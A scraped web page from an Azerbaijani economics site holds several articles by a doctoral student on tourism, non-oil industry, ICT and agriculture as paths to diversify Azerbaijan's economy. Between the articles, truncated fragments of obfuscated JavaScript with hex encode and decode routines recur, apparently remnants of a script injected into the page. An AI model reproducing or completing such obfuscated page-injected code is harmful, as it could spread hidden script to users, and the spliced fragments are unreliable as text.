Exact matches only
Search in title
Search in content
Search in posts
Search in pages
Filter by Categories
Ailə təsrrüfatı
Банк и страхование
Международная экономика
Bilik Iqtisadiyyatı
diskurs.az radio unec
Dünya İqtisadi Forumu
Fiskal Siyasət
İnforqrafika
İnnovasiya
ISE Economic Talks
Made in Azerbaijan
Макроэкономический анализ
Финансовые рынки
Marketinq
Milli iqtisadiyyat
Müsahibə
Нефть
Транспорт
Транспорт
Qender
Предпринимательство
Sənaye
Turizm
Налоги и пошлины
Домохозяйства
Экономическое образование
USD 1.7000, EUR 1.9479, TRY 0.3020, RUB 0.0259, CNY 0.2451, GEL 0.6308, GBP 2.2135, IRR 0.0040, JPY 1.5131, XAU 2086.5970, XAG 24.8452, XPT 1411.3910, XPD 1835.2095
(Azərbaycan) Turizm sənayesi iqtisadiyyatın prioritet sahəsidir
eco

Извините, этот техт доступен только в “Азербайджанский”. For the sake of viewer convenience, the content is shown below in the alternative language. You may click the link to switch the active language.

Baş verən iqtisadi proseslər bir daha onu göstərir ki ,hər bir perspektiv inkişafını düşünən ölkə və xüsusilə  neft ölkəsi qeyri-neft sektorunun inkişafını diqqətdə saxlamalı və dayanıqlı inkişaf üçün zəmin yaratmalıdır.Belə ki , bu nöqteyi nəzərdən qeyri-neft sektorunun strukturuna nəzər yetirməyimiz məqsədəuyğun olardı.

Məlum olduğu kimi ,kənd təsərrüfatı,nəqliyyat ,yungül və yeyinti sənayesi,rabitə,kimya sənayesi,turizm sənayesi və digər sahələr qeyri-neft sektoru sahələridir. Göstərilən bu sahələrin hər biri neftdən asılılığın azaldılmasında mühüm əhəmiyyətə malikdir. Burada Qeyri-neft sektoru kimi turizm sənayesini xüsusi qeyd etmək olar.turizm 1

Halhazırda ölkəmizdə turizmin inkişaf etdirilməsi üçün xeyli işlər görülür.Bunun üçün ölkə rəhbərimiz cənab Prezident tərəfindən müxtəlif fərmanlar və sərəncamlar verilimişdir.

Azərbaycanın turizm potensialı olduqca yüksəkdir. Ölkəmizin həm təbii-coğrafi, həm də müasir dünyada tutduğu mövqe Azərbaycanı turistlər üçün maraqlı bir məkana çevirib. Amma Tanrı tərəfindən Azərbaycana bəxş olunan bu gözəllikləri, bu nemətləri turizm məhsuluna çevirmək lazımdır. Dövlətimiz turizmin inkişafı istiqamətində vacib addımlar atmaqdadır. Bu baxımdan, turizm sektorunun inkişaf etdirilməsi üçün mütəxəssislərin olması da vacib şərtlərdən biridir. Hazırda turizm mütəxəssislərinin yetişdirilməsinə ehtiyac, tələbat mövcuddur. Bu ehtiyacı dəyərləndirərək ölkə rəhbərliyi müstəqil Azərbaycanda Turizm İnstitutunun yaradılmasına qərar verdi. Dövlət rəhbərliyinin qərarı əsasında 2006-cı ildə Azərbaycan Turizm İnstitutu açıldı. Turizmin özü də əhəmiyyətli dərəcədə insanlarla işləmək məsələsi olduğu üçün burada kadr amili də çox önəmlidir. Çünki burada xidmət, işin təşkili məsələləri və s. vacib məqamlar mövcuddur.

. Turizm sənayesinin müasir idarəetmə modeli sadə və çevik olmalıdır. Onun meyarları aşağıdakı kimidir. – turizm sənayesində idarəetmə fəaliyyətinin effektivliyinin təmin edilməsi; – turizm sənayesi müəssisələrinin idarəetmə hesabına rəqabətədavamlılığın təmin edilməsi.

turizm 2Inkişaf etməkdə olan ölkələrin turizmin inkişafına artan marağı Azərbaycan Respublikasının simasında da özünü büruzə verir. Turizm sferasının maddi-texniki bazasını, sosial infrastruktur sistemini dünya standartları səviyyəsində təşkil etmək üçün bu sahənin maliyyə təminatı getdikcə yaxşılaşdırılır. Turizmin investisiya təminatının yaxşılaşdırılması dövlət vəsaiti, sahibkarların kapitalı, birgə turist müəssisələrinin yaradılması və respublikaya cəlb edilən xarici investisiyalardan istifadə əsasında həyata keçirilir. Azərbaycan Respublikası Prezidentinin sərəncamı ilə 2010-2014-cü illərdə turizmin inkişafına dair “Dövlət Proqramı ” təsdiq edilmişdir.

Proqramın təsdiq edilməsində məqsəd, Azərbaycanda yüksək iqtisadi, sosial, ekoloji tələblərə cavab verən müasir turizm xidməti sahələrinin formalaşdırılması, turizm sahəsini ölkə iqtisadiyyatının əsas inkişaf dayaqlarından birinə çevrilməsinin təmin edilməsi, qeyri-neft sektorunda turizmin gəlir gətirən sahə kimi inkişaf etdirilməsi, bu sahədə yüksək keyfiyyətli xidmət səviyyəsinin yaradılması və davamlı inkişafın təmin edilməsidir. Buna görə də respublikada bu sahədə elə çevik siyasət yeridilir ki, bu da istehlak dövriyyəsinə yeni resursların cəlb edilməsinə imkan verir. Digər tərəfdən isə, xarici investisiyaların cəlb edilməsi və iqtisadi dövriyyədə istifadə olunması müddətləri biri-birilə elə razılaşdırılmalıdır ki, cəlb olunmuş vəsait gözlənilən səmərəni versin. Turizmin xarici investisiya təminatına regionların inkişaf səviyyəsini, onlarda infrastrukturların vəziyyətini nəzərə almaqla yanaşmaq lazımdır.

turizm 3

Əksər inkişaf etmiş ölkələrdə bu problemin həllində xarici və birgə sahibkarlığın imkanlarından da geniş istifadə olunur ki, bu da turist mühitinin yaxşılaşdırılması amili kimi çıxış edir. Hesablamalar göstərir ki, getmə turizmin inkişafına yönəldilən daxili və xarici investisiyaların hesabına turizmi resurslardan birinə çevirmək üçün böyük imkanlar vardır. ÜTT-nin məlumatlarına əsasən, bir turistin səyahət, yaxud istirahət etməsi üçün lazım olan orta maliyyə xərcləri əsasında ildə 1,5 mln. turist qəbul edən Azərbaycan Respublikasında 4,5 mlrd. dollara yaxın ümumi gəlir əldə etmək mümkündür. Hesab edirik ki, Azərbaycanın malik olduğu rekreasiya ehtiyatları turizmin formalarından səmərəli istifadə etməklə dövlət büdcəsinin gəlirlərinin formalaşmasının mühüm mənbələrinə çevrilə bilər. Bunun üçün ekoturizm və aqroturizmin investisiya təminatı əsaslı surətdə gücləndirilməlidir.

Azərbaycan Respublikasında Şəki-Zaqatala, Quba–Xaçmaz, Gəncə-Qazax regionlarında aqroturizm, Abşeron, Quba-Xaçmaz, Lənkəran–Astara zonalarında isə ekoturizmin inkişafı üçün böyük ehtiyat mənbəələri vardır. Əsas vəzifə ondan ibarətdir ki, bu ehtiyatları təsərrüfatçılıq dövriyyəsinə daxil etməklə onlardan səmərəli istifadə olunsun. Qeyd olunan problemin həlli yalnız dövlət vəsaiti hesabına deyil, digər maliyyə mənbələrindən də istifadəyə əsaslanmalıdır. Turizm fəaliyyətində investisiya təminatını yaxşılaşdırmaq üçün sahibkarlığın müxtəlif formalarından istifadə edilməsi iqtisadi cəhətdən məqsədəuyğundur.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «diskurs.az»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «diskurs.az»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e

(Azərbaycan) Qeyri-neft sektorunun inkişafı davamlı inkişaf modelinə keçidin mühüm istiqamətidir
What-is-Industrial-Engineering-8

Извините, этот техт доступен только в “Азербайджанский”. For the sake of viewer convenience, the content is shown below in the alternative language. You may click the link to switch the active language.

İnnovativ iqtisadiyyatın formalaşması , yerli resurs və xammalla işləyən və ixrac qabiliyyətli məhsullar istehsal edən muasir sənaye sahələrinin yaradılması  davamlı iqtisadiyyatın inkişafını əsaslandırır. Azərbaycanda son illər davamlı inkişaf xarakteri  almış  qeyri –neft sektorunda  artım  qeydə  alınmışdır.  Ölkəmiz uzun illərdir ki, neft və qaz sənayesinin mühüm inkişaf xüsusiyyətləri  ilə dünya arenasında addımlayır. Həm keçmiş SSRİ tərkibində olan dönəmdə , həm də hal-hazırkı zaman kəsiyində  Azərbaycan neft və qaz hasilatının həcmi ilə diqqət mərkəzində olmuşdur. Ölkəmiz öz iqtisadi siyasətini təkcə neft faktoruna bağlamadan ,digər sahələrin , qeyri neft sektoru sahələrinin inkişafınına yönəltmişdir. Bunu əyani şəkildə müşahidə etmək üçün yaxın illərin statistik məlumatlarına nəzər yetirmək kifayətdir.Son illərdə həyata keçirilən sənayeləşmə tədbirləri çərçivəsində neft-qaz, qızıl və digər hasilat sahələrində əldə edilmiş uğurlarla yanaşı, sənayenin diversifikasiyası genişləndirilmiş, yeni istehsal gücləri istifadəyə verilmiş, müasir texnologiyalara əsaslanan rəqabətqabiliyyətli müəssisələr yaradılmışdırSumqayıt Texnologiyalar Parkının, Alüminium İstehsalı Kompleksinin və Azərbaycan Polad İstehsalı Kompleksinin yaradılması, Bakıda Gəmiqayırma

stp 2zavodunun fəaliyyətə başlaması, Gədəbəy və Daşkəsəndə qızıl-mis emalı zavodlarının qurulması, Sumqayıtda neft-kimya sənayesində modernizasiya işlərinə başlanılması və Karbamid Zavodunun inşası, Qaradağda Sement Zavodunun istehsal gücünün artırılması və yeni zavodun inşası, Qazaxda, Naxçıvanda yeni sement zavodlarının tikilib istifadəyə verilməsi qeyri-neft sənayesinin növbəti mərhələdə daha dərin şaxələndirilməsi üçün geniş imkanlar yaradır. Ötən dövrdə ölkədə qeyri-neft sənayesinin əsas halqalarını formalaşdıran maşınqayırma, avadanlıq istehsalı, cihazqayırma və tikinti materiallarının istehsalı sahələrində yeni rəqabətqabiliyyətli müəssisələr yaradılmış, o cümlədən Gəncədə traktor və kənd təsərrüfatı texnikası, Naxçıvanda avtomobil, Mingəçevirdə elektron avadanlıqlar, Sumqayıtda günəş panellər, Qaradağda metal konstruksiyalar, Hacıqabulda seramik plitələr istehsalı müəssisələri qurulmuşdur.  Qeyri-neft sektorunun inkişafına təkan verən mühüm amillərdən olan metalurgiya sənayesinin inkişafını sürətləndirmək məqsədi ilə , Azərbaycan Polad İstehsalı Kompleksi  QSC-i yaradılmışdır. Ölkədə qeyri-neft sənayesinin inkişafı istiqamətində görülən tədbirlər artıq öz müsbət nəticəsini verməkdədir. Cari ilin birinci yarısında qeyri-neft sektorunda 7 faiz artım qeydə alınıb. Bu da ölkədə həyata keçirilən sənayeləşmə siyasətinin doğruluğunu bir daha təsdiq edir. Ümumiyyətlə, sənayenin inkişafı, xüsusilə ağır sənayenin inkişafı metal təminatından bilavasitə asılıdır. tarktor istehsali

Dünya iqtisadiyyatının qloballaşması fonunda Azərbaycanın iqtisadiyyatının neft amilindən asılılığının azaldılması, qeyri-neft sektorunun inkişafında kompleksliliyin artırılması, dünya iqtisadiyyatına kifayət qədər dərin inteqrasiya olunması, enerji və resurslara qənaət edən ekoloji təmiz texnologiyaların istehsalının stimullaşdırılması, sənayenin ayrı-ayrı sahələrinin bir-biri ilə uzlaşmış şəkildə fəaliyyət göstərməsi diqqət mərkəzində saxlanılmalıdır.

  Azərbaycanda ümumi iqtisadi artımın əsas hissəsi ulu öndər Heydər Əliyevin rəhbərliyi ilə işlənib hazırlanmış neft strategiyasının uğurlu nəticələri hesabına təmin olunsa da , son illər qeyri-neft sektoru üzrə də xüsusi fəallıq nəzərə çarpır. Bu da Azərbaycanın dövlət başçısı İlham Əliyevin rəhbərliyi ilə ölkə iqtisadiyyatının şaxələndirilməsi istiqamətində həyata keçirilən tədbirlərin məntiqi nəticəsidir. Son illər ölkəmizdə  informasiya kommunikasiya texnologiyalarının (İKT) inkişaf etdirilməsi sahəsində də əhəmiyyətli tədbirlər həyata keçirilir.IKT shekil

Qarşıdakı illərdə İKT infrastrukturu inkişaf etdiriləcək, əhaliyə müasir elektron xidmətlərin göstərilməsi imkanları genişləndiriləcək, kənd yaşayış məntəqələri də daxil olmaqla ölkə ərazisində genişzolaqlı, ucuz və keyfiyyətli internetə çıxış təmin ediləcəkdir. Distant təhsil, elektron ticarət, tele-tibb və digər müasir xidmət növlərinin geniş tətbiqinə nail olunacaq, elektron ticarət əqdləri iştirakçılarının müdafiəsini və təhlükəsizliyini təmin etmək üçün qanunvericilik təkmilləşdiriləcəkdir. Bölgələrdə İKTnin tətbiqi genişləndiriləcək, əhalinin rəqəmsal hazırlığı və ölkənin qlobal informasiya məkanına inteqrasiya səviyyəsi yüksəldiləcəkdirSənaye siyasətinin əsas məqsədlərindən biri də sənayenin rəqabət qabiliyyətinin artırılmasına yönəldilmiş tədbirlərin həyata keçirilməsindən ibarətdir. Bu tədbirlər sahəvi araşdırmalar nəticəsində müxtəlif sektorların xüsusiyyətlərinə uyğun olaraq əlavə tədbirlərlə dəstəklənməlidir. Sənayenin rəqabət qabiliyyətinin yüksəldilməsi məqsədi ilə enerji tariflərinin tənzimlənməsində çeviklik artırılmalı, çevik tarif siyasəti əlverişli vergi və gömrük rejimi və çevik məzənnə siyasəti ilə müşayiət edilməlidir. Bununla yanaşı, sənayeyə investisiyaların cəlb edilməsi üçün imkanlar genişləndirilməli, sənayeyə yönləndirilən dövlətin güzəştli kreditlərindən istifadə və lizinq imkanları artırılmalı, qeyri-neft sənayesinə investisiyaların təşviqi mexanizmi yaradılmalıdır. Sənaye müəssisələrinin quruluş xərclərinin azaldılması, sənaye zonalarından (xüsusi iqtisadi zona, sənaye parkı və sənaye məhəllələri) kənarda yerləşən sənaye layihələrinin müəssisədən kənar infrastruktur təminatının yaxşılaşdırılması, bu məqsədlə dövlət vəsaiti hesabına həyata keçirilən infrastruktur layihələrinin özəl sektorun investisiyaları ilə əlaqələndirilməsi mexanizmi qurulmalıdır. Eyni zamanda, bir sıra qabaqcıl ölkələrin təcrübəsindən istifadə edərək dövlət-özəl tərəfdaşlıq modellərinin tətbiqinin genişləndirilməsi diqqət mərkəzində saxlanılmalıdır.

Hazırladı : UNEC-in doktorantı  Quluyev R.M

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «diskurs.az»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «diskurs.az»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e

(Azərbaycan) Azərbaycanda Turizm : Qeyri-neft sektorunun mühüm inkişaf sahəsi
turizm 1

Извините, этот техт доступен только в “Азербайджанский”. For the sake of viewer convenience, the content is shown below in the alternative language. You may click the link to switch the active language.

.Məlum olduğu kimi Azərbaycan neft ölkəsi kimi dünya iqtisadi bazarında müəyyən söz sahibi kimi hər an özünü doğrultmuşdur. Ölkənin iqtisadi inkişafında davamlılığın təmin olunmasında neft və qaz amilindən asılılığın azaldılması məqsədilə qeyri-neft sektorunun müxtəlif sahələrinin inkişad etdirilməsi zərurətdir. Qeyri-neft sektoru kimi turizm mühüm əhəmiyyətlidir.
Belə ki, ölkəmizin geniş turizm potensialı var, bu da neft amilindən asılılığının azaldılmasında mühüm əhəmiyyət kəsb edir. Dünyada turizmin yüksək inkişaf etdiyi ölkələrin bu sahədə həyata keçirdiyi islahatlara və inkişaf yoluna nəzər salsaq , şahidi olarıq ki, turizm sənayesindən daxil olan vəsaitlərin artımını təmin etmək üçün mütləq şəkildə qanunvericilik aktlarının təkmilləşdirilməsinin , güzəştli şərtlərlə xarici vətəndaşların ölkəyə turist səfərlərinin stimullaşdırılması və bu sahədə turizm obyektlərinin və infrastrukturunun inkişafını dəstəkləmək ən vacib amillərdən hesab olunur.

Azərbaycanın Xəzər dənizinə çıxışının olması , geniş meşəlik ,dağlıq və iqlim-təbiət potensialına malik olması, bol sulu çaylarının mövcudluğu turizmin inkişafına güclü təkan verir.
Son zamanlar Azərbaycan Respublikasında turizm infrastrukturunun genişləndirilməsi , səmərəli şərtlərlə turizm obyektlərinin istifadəyə verilməsi və bu istiqamətdə ölkə rəhbərimiz Cənab Prezident İlham Əliyevin qəbul etdiyi ciddi qərarlar, təsdiq olunmuş sərəncamlar, fərmanlar dövlətin turizm sənayesinin inkişafını daim diqqətdə saxladığını nümayiş etdirir.
Ölkəmizdə turizmin inkişaf etdirilməsi üçün qəbul etdiyi proqramlarda turizmin inkişafına təminat yarada biləcək bazanın yaradılması , turizm sahələrinin proporsional inkişaf etdirilməsinin təmin edilməsinə, müasir tələblərə cavab verə biəcək sistemin formalaşdırılmasına vəs fəaliyyət istiqamətlərinin genişləndirlməsinə xüsusi yer verilir.
Bütün bunları nəzərə alaraq həyata keçirilən dövlət proqramlarında turizmin hərtərəfli inkişaf etdirilməsi üçün kiçik və orta sahibkarlığa geniş səlahiyyətlər verilməsi,turistlərə xidmət göstərəcək obyektləri yenidən qurmaq və onu dünya standartlarına uyğunlaşdırılması , respublikanın beynəlxalq və daxili turizm bazarında rəqabət aparmaq qabiliyyyətini artırılması , turizmin inkişaf etdirilməsi üçün mütərəqqi və səmərəli metodlardan istifadə edilməsi əsas prioritet hesab olunmalıdır.
Turizm ölkəyə xarici valyuta axını sürətləndirir,turizm xidmət şəbəkəsinin genişləndirilməsinə təkan verir və beləliklə, çox sayda yeni iş yerləri yaradılır,ölkədə məşğulluğun sahə və istiqamətlərini genişləndirir.

turizm2
Qeyri–neft sektoru kimi turizmdən daxil olan vəsait hesabına digər sənaye müəssisələrinin ,yeni-yeni turizm obyektlərinin yaradılmasını həyata keçirmək həm ölkənin iqtisadi inkişafına , həm sosial rifahın yaxşılaşmasına , həm də iqtisadiyyatın dayanıqlılığının təmin olunmasına geniş töhfə verir..

Hazırladı: UNEC-in doktorantı — Quluyev Rövşən Mustafa oğlu

(Azərbaycan) Kənd təsərrüfatının inkişafı problemləri
traktor 2

Извините, этот техт доступен только в “Азербайджанский”. For the sake of viewer convenience, the content is shown below in the alternative language. You may click the link to switch the active language.

İqtisadiyyatın inkişafının mühüm sahəsi olan kənd təsərrüfatı qeyri-neft sektorunun  tərkib hissəsi  kimi vacib əhəmiyyət kəsb edir. 2001-ci ildə ölkə rəhbərinin sərəncamı ilə “Azərbaycan Respublikasının ərzaq təhlükəsizliyi Proqramı” təsdiq edilib. Bu  proqram çərçivəsində görülmüş işlər nəticəsində kənd təsərrüfatı və ərzaq məhsullarının istehsalı əhəmiyyətli dərəcədə artıb.  Azərbaycanda sürətli iqtisadi inkişafın başlaması nəticəsində aqrar sahənin daha da inkişaf etdirilməsi üçün görülən tədbirlər də genişlənib. Aqrar sahənin inkişafı Azərbaycan Prezidentinin iqtisadiyyatın şaxələndirilməsi strategiyasının başlıca istiqamətlərindən birini təşkil edib.  Belə ki, ölkə əhalisinin təxminən 1,5 milyon nəfərinin aqrar sektorda çalışması baxımından bu sahənin inkişaf etdirilməsi həm də qeyri-neft sektorunun inkişafı, işsizliyin və yoxsulluğun azaldılması baxımından xüsusi əhəmiyyət kəsb etməkdədir .Kənd təsərrüfatının müxtəlif sahələrində fəallığın artırılması üçün stimullaşdırma həyata keçrilməlidir ki, bu sahədə məşğul olan fərdi təsərrüfat sübyektləri,kəndli fermer təsərrüfatlarının səmərəli işləməsinin , eləcədə ölkənin  kənd təsərrüfatı məhsulları ilə təmin olunmasında ,ərzaq təhlükəsizliyinin təminatlı olmasında böyük rol oynasın. Bu gün üzümçülüyün , pambıqçılığın ,tütün plantasiyalarının salınması,iri və xırda buynuzlu heyvandarlığın , balıqçılığın dəstəklənməsi ,əlbətdə  gələcəkdə öz səmərəli nəticələrini verəcək.  Bu gün azərbaycan dövləti aqrar sahədə qanunvericilik bazasını təkmilləşdirməklə ,daha mütərəqqi iqtisadi hüquqi baza yaratmaqla aqrar sahənin tərəqqisini hədəfdə saxlayır.Çünki davamlı iqtisadi inkişafa gedən yol ərzaq təhlükəsizliyinin təmin olunmasından keçir.   Dünyada baş verən dəyişkənli mühit və geosiyasi gedişat  güclü dövlətlərlə yanaşı ,doğru iqtisadi siyasət yürüdən və ərzaq təhlükəsizliyini hədəfdə saxlayan ölkələr üçün də elədə təsir göstərmir,inkişafını ləngitmir.  Aqrar sahənin inkişafı yoxsulluğun azaldılması və regionların sosial-iqtisadi inkişafına dair qəbul edilən dövlət proqramlarında aparıcı yeri tutub. “2003-2005-ci illər üçün Azərbaycan Respublikasında yoxsulluğun azaldılması və iqtisadi inkişaf üzrə Dövlət Proqramı», «Azərbaycan Respublikasında kiçik və orta sahibkarlığın inkişafı üzrə Dövlət Proqramı (2002—2005-ci illər)», «Azərbaycan Respublikası regionlarının sosial-iqtisadi inkişafı Dövlət Proqramı (2004-2008-ci illər)» və digər qəbul olunmuş sənədlərdən irəli gələn vəzifələrin yerinə yetirilməsi, o cümlədən fermerlərə maliyyə və texniki dəstəyin göstərilməsi, sahibkarlığın inkişafı, regionlarda infrastruktur layihələrinin həyata keçirilməsi əhalinin istehlakında yerli məhsulların xüsusi çəkisinin artmasını təmin edib. “2008-2015-ci illərdə Azərbaycan Respublikasında regionların sosial-iqtisadi inkişafı proqramı”da  əsasən regionlarda işsizliyin aradan qaldırılmasına və ərzaq təhlükəsizliyinin təmin olunmasına yönəldilib. Bu problemlərin həlli aqrar sahənin inkişaf strategiyasının əsasını təşkil edir və aqrar sektorla sıx bağlıdır. Aqrar sektorun inkişafı və ərzaq məhsullarının istehsalının artırılması üçün yeni texnologiyaların və müasir  texnikanın cəlb edilməsi həlledici əhəmiyyət kəsb edir.  Kənd təsərrüfatında çalışan əhalı üçün mineral gübrələrin, pestisidlərin, texnoloji avadanlıqların, tinglərin, buğda toxumlarının, cins damazlıq heyvanların ölkəyə gətirilib istehsalçılara çatdırılması dövlətin başlıca məqsədlərindəndir.

traktor 2  aqrolozinq traktor1   Aqroservislər yaratmaqla əhalinin müxtəlif növ kənd təsərrüfatı texnikasına olan tələbatın ödənilməsi ilə ,eləcə də bu sahə üçün önəmli olan,məhsuldarlığın artmasında müstəsna rol oynayan gübrələrin qiymətində daha çox güzəştə getməklə ,heyvandarlıq sahəsinin inkişafı üçün damazlıq və daha məhsuldar  heyvan cinslərinin ölkəmizə gətirilməsi hevandarlıq ilə məşğul olan təsərrüfat subyektlərinin böyük marağına səbəb olur.  Azərbaycan Respublikası Milli Məclisi tərəfindən  qəbul edilmiş qanunlar   və Azərbaycan Prezidenti tərəfindən verilən fərman və sərəncamlar kənd təsərrüfatının inkişafını sürətləndirəcək və ölkəmizin ərzaq təhlükəsizliyinin təmin olunmasına mühüm töhfə verəcəkdir.

Hazırladı:  UNEC — in doktorantı Quluyev Rövşən Mustafa oğlu

(Azərbaycan) Rövşən Quluyev. Qeyri-neft sektorunun inkişafının prioritetliyi
NENEFT1-300x2881

Извините, этот техт доступен только в “Азербайджанский”. For the sake of viewer convenience, the content is shown below in the alternative language. You may click the link to switch the active language.

Bu gün dünyada baş verən bir sıra iqtisadi-siyasi ,sosial-siyasi proseslərin gedişatı onu deməyə əsas verir ki,güclü iqtisadi sabitliyə və iqtisadi üstünlüyə malik ölkələr həmişə bu sahədə öz mülahizələrini reallaşdırırlar.Neft  və qaz bir sözlə təbii sərvətlər həmişə mübahisə mövzusu olmuşdur.Lakin yüksək iqtisadi inkişafa malik ölkələr təkcə təbii sərvətlərdən istifadə etməklə tərəqqiyə nail olmamışlar , onlar həm də bu potensiladan istifadə etməklə , səmərəli və məqsədyönlü istifadə etməklə yüksək rifah halının formalaşdırılmasına nail olmuşdur.

Məlum olduğu kimi Vətənimiz Azərbaycan neft və qaz  ,eləcə də digər təbii sərvətlərlə zəngindir .Məlumdur ki ,əlverişli investisiya mühiti formalaşdırmaqla və xarici sərmayə cəlb etməklə , bu investisiyaların iqtisadiyyatın müxtəlif sahələrinə cəlb etməklə tərəqqiyə nail olmaq mümkündür .Qeyri-neft sektoru sahələrinin inkişafını prioritet sahə kimi olmaqla yanaşı,inkişafı stimullaşdırılmalı və hüquqi mexanizmi təkmilləşdirilməlidir. Bu sahədə iqtisadi qanunvericilik daha da mütərəqqi formada işlənməlidir.Çünki qeyri-neft sektoru sahələrinin inkişafı neft-qaz amilindən asılılığın azaldılması və bir növ mübaliğəli yanaşma baxımından bu amilin  zərərsizləşdirilməsi kimi də qələmə vermək olar. Neft müxtəlif zaman kəsiyində siyasi ,iqtisadi təsirlərə mərüz qalaraq məcburi dəyərləndirilir.Bu isə neft və qaz sərvətlərinin ixracı ilə məşğul olan ölkələr üçün qeyri -stabillik yaradır.İqtisadi dayanıqlığı zəiflədir.

Beləliklə qeyd olunmalıdır ki,bu gün baş verən proseslər bir daha onu göstərir ki,qeyri-neft sektorunun iknişafı iqtisadi dayanıqlılıq baxımından olduqca vacib məsələdir. Kənd təsərrüfatı , aqrar sektor, kimya sənayesi, turizm, elm tutumlu sahələrin , informasiya -komunikasiya texnologiyaları sahələrinin,yüngül və yeyinti sənayenin  və digər qeyri-neft sahələrinin  inkişafı iqtisadi inkişafın davamlılığı və dayanıqlılığını təmin etmiş olar.

 Bu gün öl əmizdə kənd təsərrüfatının inkişafı diqqətdə saxlanılır və bu sahədə mühüm islahatlar aparılır. Əlbətdə bu da öz növbəsində ərzaq təhlükəsizliyinin təmin olunmasında mühüm əhəmiyyət kəsb edir..

 

 

Перейти к верхней панели